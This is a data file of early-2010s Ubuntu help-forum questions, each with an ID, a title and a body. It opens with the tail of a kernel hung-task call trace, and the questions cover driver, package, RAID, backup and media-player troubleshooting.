ffffffff811a6cb0 > ] read_dev_sector+0x30/0xa0 21:46:04 ... : [ 602.520321 ] [ < ffffffff811a7fcd > ] amiga_partition+0x6d/0x460 21:46:04 ... : [ 602.520328 ] [ < ffffffff811a7938 > ] check_partition+0x138/0x190 21:46:04 ... : [ 602.520335 ] [ < ffffffff811a7a7a > ] rescan_partitions+0xea/0x2f0 21:46:04 ... : [ 602.520342 ] [ < ffffffff811744c7 > ] __blkdev_get+0x267/0x3d0 21:46:04 ... : [ 602.520348 ] [ < ffffffff81174650 > ] ? blkdev_open+0x0/0xc0 21:46:04 ... : [ 602.520354 ] [ < ffffffff81174640 > ] blkdev_get+0x10/0x20 21:46:04 ... : [ 602.520359 ] [ < ffffffff811746c1 > ] blkdev_open+0x71/0xc0 21:46:04 ... : [ 602.520367 ] [ < ffffffff811419f3 > ] __dentry_open+0x113/0x370 21:46:04 ... : [ 602.520375 ] [ < ffffffff81253f8f > ] ? security_inode_permission+0x1f/0x30 21:46:04 ... : [ 602.520383 ] [ < ffffffff8114de3f > ] ? inode_permission+0xaf/0xd0 21:46:04 ... : [ 602.520390 ] [ < ffffffff81141d67 > ] nameidata_to_filp+0x57/0x70 21:46:04 ... : [ 602.520397 ] [ < ffffffff8115207a > ] do_filp_open+0x2da/0xba0 21:46:04 ... : [ 602.520404 ] [ < ffffffff811134a8 > ] ? unmap_vmas+0x178/0x310 21:46:04 ... : [ 602.520413 ] [ < ffffffff8115dbfa > ] ? alloc_fd+0x10a/0x150 21:46:04 ... : [ 602.520419 ] [ < ffffffff81141769 > ] do_sys_open+0x69/0x170 21:46:04 ... : [ 602.520425 ] [ < ffffffff811418b0 > ] sys_open+0x20/0x30 21:46:04 ... : [ 602.520434 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b 21:46:04 ... : [ 602.520443 ] info : task mdadm:2283 blocked for more than 120 seconds . 21:46:04 ... : [ 602.520447 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . 21:46:04 ... : [ 602.520451 ] mdadm d 0000000000000000 0 2283 2212 0x00000000 21:46:04 ... : [ 602.520460 ] ffff88002cca7d98 0000000000000086 0000000000015bc0 0000000000015bc0 21:46:04 ... : [ 602.520468 ] ffff88002ededf78 ffff88002cca7fd8 0000000000015bc0 ffff88002ededbc0 21:46:04 ... : [ 602.520475 ] 0000000000015bc0 ffff88002cca7fd8 0000000000015bc0 ffff88002ededf78 21:46:04 ... : [ 602.520483 ] call trace : 21:46:04 ... : [ 602.520492 ] [ < ffffffff81543a97 > ] __mutex_lock_slowpath+0xf7/0x180 21:46:04 ... : [ 602.520500 ] [ < ffffffff8154397b > ] mutex_lock+0x2b/0x50 21:46:04 ... : [ 602.520506 ] [ < ffffffff8117404d > ] __blkdev_put+0x3d/0x190 21:46:04 ... : [ 602.520512 ] [ < ffffffff811741b0 > ] blkdev_put+0x10/0x20 21:46:04 ... : [ 602.520518 ] [ < ffffffff811741f3 > ] blkdev_close+0x33/0x60 21:46:04 ... : [ 602.520526 ] [ < ffffffff81145375 > ] __fput+0xf5/0x210 21:46:04 ... : [ 602.520533 ] [ < ffffffff811454b5 > ] fput+0x25/0x30 21:46:04 ... : [ 602.520539 ] [ < ffffffff811415ad > ] filp_close+0x5d/0x90 21:46:04 ... : [ 602.520545 ] [ < ffffffff81141697 > ] sys_close+0xb7/0x120 21:46:04 ... : [ 602.520552 ] [ < ffffffff810121b2 > ] system_call_fastpath+0x16/0x1b
28916	how do i mount an ipod touch with banshee ?	i 'm using the banshee media player with my ipod nano 5g and it works fine , but for some reason it wo n't recognise the touch 2g at all this error message comes up : dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) how do i mount my ipod ? thanks robin
28918	alternative to netscanner	is there a software alternative to netscanner ( which runs on the windows platform ) ?
28925	how do i connect to a wireless network ?	i just installed 10.10 x64 and can not even find my wireless network let alone connect to it . i 've searched all over se and ubuntu forums and can not find out how to do this simple thing . can some one please give me the answer ? it is plugged in right now and is 100 % updated . it is a desktop with wireless card . 0 : phy0 : wireless lan soft blocked : no hard blocked : no here 's the output of sudo lshw -c network : *-network disabled description : wireless interface product : rt2860 vendor : ralink physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 70:1a:04 : f4 : de : e9 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=2.6.35-27-generic firmware=n/a latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fcff0000-fcffffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 03 serial : 00:23:54 : fd : c2:32 size : 100mb/s capacity : 1gb/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.14 latency=0 link=yes multicast=yes port=mii speed=100mb/s resources : irq:44 ioport : d800 ( size=256 ) memory : fceff000-fcefffff memory : ddffc000-ddffffff memory : fcec0000-fcedffff update i have discovered that this is a know issue with the rt2860 . i have been following step by step the instructions found here i decided to stat over because i was getting stuck on step 5 : sudo rmmod rt2860sta is was giving me this problem : error : module rt2860sta does not exist in /proc/modules since i started over i can not even get past step 5 sudo make i get this : make : *** no targets specified and no makefile found . stop . i am lost . any help would be appreciated .
28926	how to monitor network bandwidth per user on ubuntu server ?	i have some shell users on a server with 300gb of monthly data transfer . how can i monitor bandwidth usage per user ?
28927	http archive ( .har ) log reader ?	i 've recently moved to kubuntu . is there any app to read http archive log ( .har ) . i know about this http : //www.softwareishard.com/har/viewer/ . i 'm looking for an offline app to view .har files . thanks , jeetesh
28929	how do i enable webgl sites with firefox 4 beta ?	i am using firefox 4.0rc1 from the mozilla team 's `` firefox next '' ppa . my about : config has webgl.enabled_for_all_sites set to true as most guides recommend that and also say that is all that is needed . it does n't work for me . the main mozilla demos page ( `` web o ' wonder '' ) gives me : unfortunately , while your browser supports webgl , your video drivers may be too old . to view any of the demos tagged with webgl , try updating your drivers at nvidia , amd , and intel . you can still watch screencasts of the webgl demos or fully experience our other non-webgl demos without updating . my laptop ( a thinkpad x200s ) has an intel gma 4500hd chipset and my xserver-xorg-video-intel version is 2:2.12.0-1ubuntu5.2 this mozilla demo gives me `` no webgl context found . ''
28934	deleted unintentionally on your local host ? deleted on the cloud ?	that does n't sound right to me.. no way to restore the files ?
28943	ca-certificates-java fails when trying to install openjdk-6-jre	i use a vps with ubuntu server 10.10 x64 . i want to use java and run the command sudo apt-get install openjdk-6-jre but it fails because the installation encounted errors while processing ca-certificates-java . i have tried to install the failed package with : sudo apt-get install ca-certificates-java how can i solve this ? i have run sudo apt-get update and sudo apt-get upgrade but i get the same errors after that . i have also installed ubuntu server x64 on a virtualbox , but the two ubuntu server 10.10 has different kernel versions ( 2.6.35 on virtualbox and 2.6.18 on my vps ) . and on virtualbox i can install jetty without any problems . the vps is a fresh install of ubuntu server 10.10 x64 , the first command i was running was sudo apt-get install openjdk-6-jre . when i run sudo apt-get install ca-certificates-java i get this message : reading package lists ... done building dependency tree reading state information ... done ca-certificates-java is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0b of additional disk space will be used . do you want to continue [ y/n ] ? here i press y then i get this message : setting up ca-certificates-java ( 20100412 ) ... creating /etc/ssl/certs/java/cacerts ... error adding brasil.gov.br/brasil.gov.br.crt error adding cacert.org/cacert.org.crt error adding debconf.org/ca.crt error adding gouv.fr/cert_igca_dsa.crt error adding gouv.fr/cert_igca_rsa.crt error adding mozilla/abaecom_=sub.__am._bankers_assn.=_root_ca.crt error adding mozilla/aol_time_warner_root_certification_authority_1.crt error adding mozilla/aol_time_warner_root_certification_authority_2.crt error adding mozilla/addtrust_external_root.crt error adding mozilla/addtrust_low-value_services_root.crt error adding mozilla/addtrust_public_services_root.crt error adding mozilla/addtrust_qualified_certificates_root.crt error adding mozilla/america_online_root_certification_authority_1.crt error adding mozilla/america_online_root_certification_authority_2.crt error adding mozilla/baltimore_cybertrust_root.crt error adding mozilla/comodo_certification_authority.crt error adding mozilla/comodo_ecc_certification_authority.crt error adding mozilla/camerfirma_chambers_of_commerce_root.crt error adding mozilla/camerfirma_global_chambersign_root.crt error adding mozilla/certplus_class_2_primary_ca.crt error adding mozilla/certum_root_ca.crt error adding mozilla/comodo_aaa_services_root.crt error adding mozilla/comodo_secure_services_root.crt error adding mozilla/comodo_trusted_services_root.crt error adding mozilla/dst_aces_ca_x6.crt error adding mozilla/dst_root_ca_x3.crt error adding mozilla/digicert_assured_id_root_ca.crt error adding mozilla/digicert_global_root_ca.crt error adding mozilla/digicert_high_assurance_ev_root_ca.crt error adding mozilla/diginotar_root_ca.crt error adding mozilla/digital_signature_trust_co._global_ca_1.crt error adding mozilla/digital_signature_trust_co._global_ca_2.crt error adding mozilla/digital_signature_trust_co._global_ca_3.crt error adding mozilla/digital_signature_trust_co._global_ca_4.crt error adding mozilla/entrust.net_global_secure_personal_ca.crt error adding mozilla/entrust.net_global_secure_server_ca.crt error adding mozilla/entrust.net_premium_2048_secure_server_ca.crt error adding mozilla/entrust.net_secure_personal_ca.crt error adding mozilla/entrust.net_secure_server_ca.crt error adding mozilla/entrust_root_certification_authority.crt error adding mozilla/equifax_secure_ca.crt error adding mozilla/equifax_secure_global_ebusiness_ca.crt error adding mozilla/equifax_secure_ebusiness_ca_1.crt error adding mozilla/equifax_secure_ebusiness_ca_2.crt error adding mozilla/firmaprofesional_root_ca.crt error adding mozilla/gte_cybertrust_global_root.crt error adding mozilla/gte_cybertrust_root_ca.crt error adding mozilla/geotrust_global_ca.crt error adding mozilla/geotrust_global_ca_2.crt error adding mozilla/geotrust_primary_certification_authority.crt error adding mozilla/geotrust_universal_ca.crt error adding mozilla/geotrust_universal_ca_2.crt error adding mozilla/globalsign_root_ca.crt error adding mozilla/globalsign_root_ca_-_r2.crt error adding mozilla/go_daddy_class_2_ca.crt error adding mozilla/ips_clase1_root.crt error adding mozilla/ips_clase3_root.crt error adding mozilla/ips_clasea1_root.crt error adding mozilla/ips_clasea3_root.crt error adding mozilla/ips_chained_cas_root.crt error adding mozilla/ips_servidores_root.crt error adding mozilla/ips_timestamping_root.crt error adding mozilla/netlock_business_=class_b=_root.crt error adding mozilla/netlock_express_=class_c=_root.crt error adding mozilla/netlock_notary_=class_a=_root.crt error adding mozilla/netlock_qualified_=class_qa=_root.crt error adding mozilla/network_solutions_certificate_authority.crt error adding mozilla/quovadis_root_ca.crt error adding mozilla/quovadis_root_ca_2.crt error adding mozilla/quovadis_root_ca_3.crt error adding mozilla/rsa_root_certificate_1.crt error adding mozilla/rsa_security_1024_v3.crt error adding mozilla/rsa_security_2048_v3.crt error adding mozilla/securetrust_ca.crt error adding mozilla/secure_global_ca.crt error adding mozilla/security_communication_root_ca.crt error adding mozilla/sonera_class_1_root_ca.crt error adding mozilla/sonera_class_2_root_ca.crt error adding mozilla/staat_der_nederlanden_root_ca.crt error adding mozilla/starfield_class_2_ca.crt error adding mozilla/startcom_certification_authority.crt error adding mozilla/startcom_ltd..crt error adding mozilla/swisssign_gold_ca_-_g2.crt error adding mozilla/swisssign_platinum_ca_-_g2.crt error adding mozilla/swisssign_silver_ca_-_g2.crt error adding mozilla/swisscom_root_ca_1.crt error adding mozilla/tc_trustcenter__germany__class_2_ca.crt error adding mozilla/tc_trustcenter__germany__class_3_ca.crt error adding mozilla/tdc_internet_root_ca.crt error adding mozilla/tdc_oces_root_ca.crt error adding mozilla/turktrust_certificate_services_provider_root_1.crt error adding mozilla/turktrust_certificate_services_provider_root_2.crt error adding mozilla/taiwan_grca.crt error adding mozilla/thawte_personal_basic_ca.crt error adding mozilla/thawte_personal_freemail_ca.crt error adding mozilla/thawte_personal_premium_ca.crt error adding mozilla/thawte_premium_server_ca.crt error adding mozilla/thawte_server_ca.crt error adding mozilla/thawte_time_stamping_ca.crt error adding mozilla/utn-user_first-network_applications.crt error adding mozilla/utn_datacorp_sgc_root_ca.crt error adding mozilla/utn_userfirst_email_root_ca.crt error adding mozilla/utn_userfirst_hardware_root_ca.crt error adding mozilla/valicert_class_1_va.crt error adding mozilla/valicert_class_2_va.crt error adding mozilla/verisign_class_3_public_primary_certification_authority_-_g5.crt error adding mozilla/verisign_class_1_public_primary_certification_authority.crt error adding mozilla/verisign_class_1_public_primary_certification_authority_-_g2.crt error adding mozilla/verisign_class_1_public_primary_certification_authority_-_g3.crt error adding mozilla/verisign_class_2_public_primary_certification_authority.crt error adding mozilla/verisign_class_2_public_primary_certification_authority_-_g2.crt error adding mozilla/verisign_class_2_public_primary_certification_authority_-_g3.crt error adding mozilla/verisign_class_3_public_primary_certification_authority.crt error adding mozilla/verisign_class_3_public_primary_certification_authority_-_g2.crt error adding mozilla/verisign_class_3_public_primary_certification_authority_-_g3.crt error adding mozilla/verisign_class_4_public_primary_certification_authority_-_g2.crt error adding mozilla/verisign_class_4_public_primary_certification_authority_-_g3.crt error adding mozilla/verisign_rsa_secure_server_ca.crt error adding mozilla/verisign_time_stamping_authority_ca.crt error adding mozilla/visa_international_global_root_2.crt error adding mozilla/visa_ecommerce_root.crt error adding mozilla/wellssecure_public_root_certificate_authority.crt error adding mozilla/wells_fargo_root_ca.crt error adding mozilla/xramp_global_ca_root.crt error adding mozilla/betrusted_root_ca-baltimore_implementation.crt error adding mozilla/betrusted_root_ca.crt error adding mozilla/betrusted_root_ca_-_entrust_implementation.crt error adding mozilla/betrusted_root_ca_-_rsa_implementation.crt error adding mozilla/thawte_primary_root_ca.crt error adding signet.pl/signet_ca1_pem.crt error adding signet.pl/signet_ca2_pem.crt error adding signet.pl/signet_ca3_pem.crt error adding signet.pl/signet_ocspklasa2_pem.crt error adding signet.pl/signet_ocspklasa3_pem.crt error adding signet.pl/signet_pca2_pem.crt error adding signet.pl/signet_pca3_pem.crt error adding signet.pl/signet_rootca_pem.crt error adding signet.pl/signet_tsa1_pem.crt error adding spi-inc.org/spi-ca-2003.crt error adding spi-inc.org/spi-cacert-2008.crt error adding telesec.de/deutsche-telekom-root-ca-2.crt failed ( vm used : java-6-openjdk ) . dpkg : error processing ca-certificates-java ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : ca-certificates-java e : sub-process /usr/bin/dpkg returned an error code ( 1 ) update i also get a problem when running java -version : error occurred during initialization of vm could not reserve enough space for object heap could not create the java virtual machine . my vps had 128mb of memory , i changed to 256mb but got the same problem . then i changed to 512mb and got the same problem . i found a related post on a forum : sub-process /usr/bin/dpkg returned an error code ( 1 ) and i tried : sudo apt-get clean sudo apt-get -- reinstall install openjdk-6-jre sudo dpkg -- configure -a but i got the same problem , even when i 'm using 512mb of memory . any suggestions ? update 2 : i have now created a new vps with 512mb and ubuntu server 10.04 lts x64 and run these commands : sudo apt-get update sudo apt-get upgrade sudo apt-get install openjdk-6-jre but i got the same error messages . if i do the same thing in virtualbox everything works fine .
28947	an error occurrend while adding files to archive	i am trying to compress and backup my /var/www/ . i stopped apache , but i still get this error : an error occurrend while adding files to archive
28950	youtube locking up ubuntu after update	i am having locking issues on youtube ever since today 's update . firefox and google chrome crash it . changing back to kernel 6 . **.28 ( one below ) did not help . flash + ubuntu is not really kicking . more info here .
28952	consistent flash player crash only on youtube	it could be similar to one of the bugs listed on launchpad ( # 689158 ) , but may not be . basically , i used to occasionally get a crash on youtube and opening a new browser or rebooting ( do n't remember which ) took care of the problem . however , now , every time i try to open a video on youtube , i get the frowning block and the message , `` the adobe flash plugin has crashed . '' however , hulu would also call for adobe , right ? but i can see videos there .
28954	wget has a 4 second delay	i have tried to wget a page with windows/mac , and the response is instant while the the linux application delays for 4 seconds before it shows the response . the command i ran is : wget http : //192.168.0.135/test.cgi ? cmd= -o test.txt the result in ubuntu : -- 2011-03-04 14:21:17 -- http : //192.168.0.135/test.cgi ? cmd= connecting to 192.168.0.135:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `test.txt' [ < = > ] 17 -- .-k/s in 0s 2011-03-04 14:21:22 ( 1.88 mb/s ) - `test.txt ' saved [ 17 ] running the command in mac yields : -- 2011-03-04 14:22:33 -- http : //192.168.0.135/test.cgi ? cmd= connecting to 192.168.0.135:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `test.txt' [ < = > ] 17 -- .-k/s in 0s 2011-03-04 14:22:33 ( 755 kb/s ) - `test.txt ' saved [ 17 ] i believe it may related to some setting in the network configuration , such as packet size , window frame , but i have no idea how to set this . the output of uname -a ( kernel version ) : linux linux017 2.6.35-25-generic-pae # 44-ubuntu smp fri jan 21 19:01:46 utc 2011 i686 gnu/linux the version of wget ( wget -- version ) is : gnu wget 1.12
28956	problems setting up davmail in kubuntu 11.04	have n't had a chance to setup davmail per the earlier discussion around connecting to my exchange box w/ kontact but tonight i had some free time . so i have davmail installed and working i thinking , but the problem that i am running into is the icon does n't not show up in the system tray . the documentation says right-click o the tray , but there are no icons to right click on . any help would be greatly appreciated . running kubuntu 11.04 thanks , jonathn
28961	no notifications for facebook or twitter in gwibber	i am using gwibber and have my facebook and twitter account configured in it . my system crashed 2 days ago after an update messed it up and after resurrecting it , i have configured it again . but now it doesnt display any notifications . i have checked the boxes ( in preference ) to display all messages but its still no go . need help !
28962	youtube videos have a red tint	since yesterday , all youtube videos have a red / pink tint . vimeo and other video sites are working . it seems strange that it 's only on youtube , but since other people i asked do n't have this problem , i think it 's a flash plugin problem . it does this on all my browsers .
28965	how to configure ubuntu for lightweight low-memory usage ?	i just upgraded an old , secondary computer to the latest kubuntu ( 10.10 ) . it seems the effort was a bit too much for the hardware and one 512mb memory module died . i tried to take it away , clean the connectors , put it back several times , but to no avail . until such a time i can find a second hand ddr memory module , i am left with a meagre 256mb ram , which is below the official requirements ( 384mb ) to run kubuntu/kde . indeed : the computer constantly swaps the memory , making everything painfully slow . since kubuntu is already installed and i use it on all my computers ( and i want to keep kde for when i really need it ) , how can i configure ubuntu to squeeze out every bit of unnecessary memory usage ? this is a secondary computer but still very useful . we use it mostly for web browsing . a `` lightweight '' tag is missing .
28969	how do you change the default shell for all users to bash ?	i want every new user from now on to have bash as their shell by default . i know that to change your own shell to bash , you would use the command `` chsh -s /bin/bash '' , but how do i automatically set all future users ' shell to bash by default ?
28971	log & monitor mysql databases on servers	how mysql databases logged and monitored on ubuntu servers in real time ? . i checked /var/log/mysql.log and found it empty . edit 1 : the log was not enabled in the mysql configuration file . now it logs and i could see the logs in the file /var/log/mysql/mysql.log but this could not be sufficient to gather additional information about the database logs . is there any other way or any popular open source tool ?
28977	how to hide recent files and most used apps ?	how can i hide recent files that my ubuntu netbook 's unity menu shows when i click on the files and folder icon ? okay ! i watch porn sometimes and right after that it appears in the files and folder menu . and believe me , that is not a good thing . : d so , please tell me if there is a way to do this : d
28978	how to get rid of multiple linux versions in grub boot menu	i 've been using dual boot on my pc for some time now , to use ubuntu along side with windows 7 . one very disturbing thing happens , when ubuntu linux core gets updated ( this happens once in a while ) . they are added as options to the grub menu so , my boot menu now looks like this : ubuntu , with linux 2.6.35-27 generic ubuntu , with linux 2.6.35-27 generic ( recovery mode ) ubuntu , with linux 2.6.35-25 generic ubuntu , with linux 2.6.35-25 generic ( recovery mode ) ubuntu , with linux 2.6.35-24 generic ubuntu , with linux 2.6.35-24 generic ( recovery mode ) ubuntu , with linux 2.6.35-22 generic ubuntu , with linux 2.6.35-22 generic ( recovery mode ) memory test windows 7 this gets very annoying , because i want to load windows by default , but after every update it shifts down and i have to go to grub config and change the default option . my question : how to get rid of older versions of linux in the grub menu and leave only the newest one ?
28982	how to use fingerprint authentication on a hp dv6-3049tx ?	how can i use the fingerprint reader on my hp dv6-3049tx ? i 've tried it with some software ( please edit so we know what you 've tried ) but it just says `` no device '' .
28983	is there a usb pedal solution for transcription ?	for transcription it can be useful to use a pedal to control playback of an audio stream so you do n't have to stop typing . are there any combinations hardware and software that work under ubuntu for this ? ( my personal ideal would be to get a usb pedal to trigger scripts that make api calls to vlc or something , but i 'd settle for just about anything ! )
28989	auto-update and email	i 've got several ubuntu 10.10 servers which should all be set to do automatic security updates . is there any way i could get them to send me an email when they apply updates ( particularly if they fail ) ? i 'm using r-u-on to monitor availability , disk space etc but the security updates are very important and i do n't have a good way to monitor them . i could possibly script something myself but i figured it 's the kind of thing that 's probably been solved many times already .
28990	where is the dom xml package for php 5 ?	is there any dom xml package available for php5 as php4-domxml in the case of php4 ?
28993	apple mbp 7,1 color profile xcalib	i have installed kubuntu 64bit on my mbp 7,1 . after installation i was going through following documentation ( screen ) https : //help.ubuntu.com/community/macbookpro7-1/maverick # screen i am confused about line /usr/bin/xcalib `` /etc/xcalib/ < insert name of profile here > '' which profile to put at that place ? i am getting following output on command prompt bharat @ bharat-macbookpro : ~ $ ls /etc/xcalib color lcd-00000610-0000-9cc5-0000-000004273140.icc epson pj -00004ca3-0000-a600-0000-000028e98001.icc syncmaster-00004c2d-0000-0117-4c45-31370b4074f5.icc
28994	why does my application hang in interruptible state ?	i am running on ubuntu 10.04 lts server an gtk application that used to work fine . it suddenly started to hang in interruptible state ( sl+ ) without any apparent reason . here is a snippet of the strace : poll ( [ { fd=3 , events=pollin } , { fd=5 , events=pollin } ] , 2 , 0 ) = 0 ( timeout ) poll ( [ { fd=5 , events=pollin|pollout } ] , 1 , -1 ) = 1 ( [ { fd=5 , revents=pollout } ] ) writev ( 5 , [ { `` \2\30\4\0\224\4\240\0\0 @ \0\0\37\0\240\0\2\4\4\0\224\4\240\0\0 @ \0\0\37\0\240\0 '' ... , 192 } , { null , 0 } , { `` '' , 0 } ] , 3 ) = 192 read ( 5 , 0x2ba9ac4 , 4096 ) = -1 eagain ( resource temporarily unavailable ) i googled that line read ( 5 , 0x2ba9ac4 , 4096 ) , which seems to be more significant , and it seems that many other applications tend to have the same problem . i tried to restart my x server , but it did n't help . do you have an idea how to solve this problem ?
28995	setup cron weekly backup	i want to make a backup of my /var/lib/mysql and /var/www folders and save them as tar.gz files to my mounted network file server ( uslons001 ) . here is my bash file located in : /bin/backups/mysqlbackup.sh # ! /bin/bash mkdir /home/lv_admin/uslons001/`date + % d % m % y` cd /home/lv_admin/uslons001/`date + % d % m % y` tar -czf mysql.tar.gz /var/lib/mysql tar -czf www.tar.gz /var/www which works perfectly fine when i execute it in a cmd shell but when i setup the cron job it never runs , so i 'm not setting the cron job up properly . my cron job looks like this . 36 10 * * 5 /bin/backups/mysqlbackup.sh ..there is also nothing in the /var/log/cron.log file , so no errors are being logged . ( even after enabling cron logging in the /etc/syslog.conf file
28996	how to retrieve data from a corrupted volume	my ubuntu 10.10 just crashed , probably due to hardware error ( and in the end i was getting errors like unknown filesystem ... .. grub > .. , and it went to the grub console before i could take any other action ) . i reinstalled the same version from a usb stick . i had ubuntu installed with the ext4 file system and i also have the same filesystem in the same hard disk on a different drive . when i try to access my previous filesystem , i get errors : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda6 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i had some important files in the previous volume ; i do n't know how to retrieve them . and what are the chances that i would get the same outcome ( hardware error ) ? please help me !
29002	how can i install other applications after a failed installation using apt-get ?	i have a vps with ubuntu server 10.10 x64 . i tried to install java using apt-get install openjdk-6-jre but that fails , see ca-certificates-java fails to install . now i would like to install php with sudo apt-get install nginx php5-fpm php-apc php5-pgsql php5-suhosin but that also fails , with the same error message as i had with java . why is that ? how can i install other applications now after the installation of java has failed ?
29004	regain sudo rights after removing from admin group	i accidentally removed myself from the admin group when editing the user . now i can no longer use sudo . the error says : ber is not in the sudoers file . this incident will be reported . i booted up in rescue mode , but , when going into root prompt , it asks me for the root password . i do n't have one , and providing with my own ( first and only ubuntu-user ) password , it wo n't allow entrance . my harddisk is encrypted , but only the /home/user part , not the entire disk , afaik . what can i do ?
29010	shut down/log out , me menu absent in panel	i upgraded my lucid installation to maverick today via an alternate cd . everything went fine but the shut down icon which provides the options to log out , suspend , hibernate etc . in the top right corner of the panel and the me menu which allows to set chat status are absent ! i tried searching for suitable options in 'add to panel ' but can not find the exact solution - shut down provides option only to shut down , log out only to log out and so on .
29013	script to monitor window title changes	here 's the deal : i use the lastfm package to listen my last.fm ( duh ) ... and i want to show some notify-osd notifications when a new music starts . as long the program do n't supports it , i want to create a shell script that will monitor the window title of the lastfm player and send a notification when it changes . what do you think ? how can i start ?
29014	how to access a fake raid ?	i have a fake raid , which i wanted to access using mdadm /dev/md0 -a -c 128 -l stripe -- verbose /dev/sda /dev/sdc which should be right , as far as i understand the man page . but i get the message mdadm : option -l not valid in assemble mode leaving the offending option out leads to mdadm : failed to create /dev/md0 and ( despite verbose ) no more information . i 'm assuming that -a requires some mdadm-specific header which is obviously missing . i probably need to use `` build '' instead of assemble , but from the description i 'm really unsure whether this is a non-destructive operation . is it ? what should i exactly do ? update i see i have n't made clear , that the array already exists as a fake-raid ( i ca n't give the details about my mainboard now ) . it looks like doing nothing except for interleaving blocks , so i hoped it could be easily done using mdadm , too . maybe i 'm completely wrong , but all the info i 've found was concerned with booting from fake-raid , what i do n't really need . i 'd be happy with a read access for now . update 2 the solution from the answer nearly works . my fake-raid gets recognized by dmraid , but it refuses to start because of missing disks . i 've forgotten to mention that my raid10 is running without two disks i.e . it 's just stripped . ( i 've already moved the important data to a safer place ) .
29016	error with ape server installation	i was trying to install ape-server from the .deb file at the ape-server homepage ( www.ape-project.org ) and i ran into an error so wanted to try removing the installation and reinstalling . i did a sudo apt-get remove ape-server which ran successfully but left ape-server folders in my /etc/ and /etc/init.d locations . me being an idiot new comer to linux decided that manually delete those folders . now when i reinstall the ape-server those folders do n't get recreated and therefore i can not send the /etc/init.d/ape-server [ option ] command because the folder is not found . when i try to sudo apt-get purge ( or remove ) ape-server i get the following sudo apt-get purge ape-server reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : ape-server* 0 upgraded , 0 newly installed , 1 to remove and 92 not upgraded . 1 not fully installed or removed . after this operation , 1,753kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 43924 files and directories currently installed . ) removing ape-server ... invoke-rc.d : unknown initscript , /etc/init.d/ape-server not found . dpkg : error processing ape-server ( -- purge ) : subprocess installed pre-removal script returned error exit status 100 update-rc.d : /etc/init.d/ape-server : file does not exist dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : ape-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) my question is ; how do i remove all of the ape-server installation packages that were installed so i can reinstall from scratch ?
29022	screensaver freezes ?	i am using ubuntu 10.04 . over the last couple of days , i am having a weird problem : once the machine gets into screen saver , it is impossible to get it `` out '' . i do see the mouse cursor move as i move the mouse , but the login popup ( with user / password ) does not show up and the screen remains `` frozen '' . any idea what might be going wrong ? for the time being , i have no choice but to restart the computer in order to be able to resume work . thanks .
29024	what is happening with the ubuntuweeklynewsletter ?	being a big fan of the ubuntuweeklynewsletter , i 'd like to know why it is not published regularly anymore . the last issue dates back to mid-january . thanks !
29025	how to drag and drop a picture from a home folder into an open application in full size ?	how to drag and drop a picture from a home folder into an open application in full size ? i wanted to take a picture file ( cd cover ) and drag-and-drop it to rhythmbox for a selected song/album . not sure how to do that in unity . please help .
29029	mpd conflicting with other applications -- taking control of pulse ?	simple explanation if mpd is playing and sound attempts to play through another application , x , sound from x will not be output . if sound from another application , x , is playing and mpd then attempts to play , no sound will be output from mpd whilst sound from x continues to play . details i first noticed this problem with flash , and this continues to be the most common scenario . i posted a question about this before realising it was not strictly flash-related , but instead is something to do with mpd . my biggest frustration comes from trying to get mpd working again , as i ca n't seem to pin down any method . sometimes pulseaudio -k seems to help , other times sudo /etc/init.d/mpd restart , others killing chromium ( due to flash ) with sigterm . most of the time it 's a combination of the above . i think this might be because i run mpd as another user and use pulseaudio . it is not run as root or current user . also , mpd is compiled with pulse support . i have tried numerous things , however i honestly could n't recite what , as it has been some time since . i 'd rather not go poking around without some direction , but i 'd be really happy to fix this problem once and for all . mpd.conf simplified by removing comments/blank lines . music_directory `` /var/lib/mpd/music '' playlist_directory `` /var/lib/mpd/playlists '' db_file `` /var/lib/mpd/tag_cache '' log_file `` /var/log/mpd/mpd.log '' pid_file `` /var/run/mpd/pid '' state_file `` /var/lib/mpd/state '' user `` mpd '' bind_to_address `` wilson '' input { plugin `` curl '' } audio_output { type `` pulse '' name `` my pulse output '' } filesystem_charset `` utf-8 '' id3v1_encoding `` utf-8 '' question for the sake of keeping this a question : does anyone know what is causing this , or how to fix it without running mpd as the current user ?
29031	how do i add a windows live account to empathy ?	i have a windows live account that i want to add to empathy for messaging at work . i use my work email as my login . nothing i try will get empathy to connect . i have already removed telepathy butterfly plugin , still nothing . what are the setting for adding windows live account ? empathy 2.30.3
29036	how to use a hotkey shortcut to run a launcher ?	i have a launcher on my desktop . i would like to run it via a keyboard shortcut . is it possible ?
29037	is it possible to post images with gwibber ?	if i drag and drop an image to gwibber , will sending work ? ( will it upload the image and link to it ) . or is this not supported ? p.s . - i 've never tried , but i just thought of it .
29040	macbook pro : should i virtualize ubuntu or use boot camp ?	i 'm looking to run ubuntu on a 2008 macbook pro 2.4ghz c2d , 2gb gddr3 . will it be okay performance wise through virtualization such as vmware or should i use bootcamp ? thanks .
